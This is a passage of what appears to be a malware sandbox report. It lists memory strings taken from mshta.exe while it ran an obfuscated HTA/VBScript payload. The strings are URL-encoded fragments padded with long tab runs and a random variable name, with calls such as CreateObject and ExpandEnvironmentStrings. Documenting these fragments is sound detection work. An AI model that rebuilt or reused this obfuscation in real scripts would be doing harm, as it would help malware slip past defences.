9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464500007.000000000050D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465579064.0000000000510000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464786372.000000000050E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464576777.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09SEt%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                    Source: mshta.exe, 00000003.00000003.415540284.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.414249570.0000000003948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417476267.0000000003959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u(52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253D%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                    Source: mshta.exe, 0000000F.00000003.456917806.00000000048EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH&ChR(34),0
                    Source: mshta.exe, 0000000F.00000003.464500007.000000000050D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465579064.0000000000510000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464786372.000000000050E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464576777.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09seT%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%3A%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09SEt%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%253D%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2
                    Source: mshta.exe, 00000003.00000003.415540284.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.414249570.0000000003948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417476267.0000000003959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.eXpandenviRonMEntsTRINgs%252528%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                    Source: mshta.exe, 0000000F.00000003.464981480.00000000048EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "seTrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=creATeoBjeCTSS
                    Source: mshta.exe, 0000000F.00000003.455662548.0000000000537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VCTYPE%20html%3E%0A%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEmulateIE8%22%20%3E%0A%3Chtml%3E%0A%3Cbody%3E%0A%3CSCrIPT%20TYPe%3D%22TeXT/vBsCRiPT%22%3E%0ADim%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
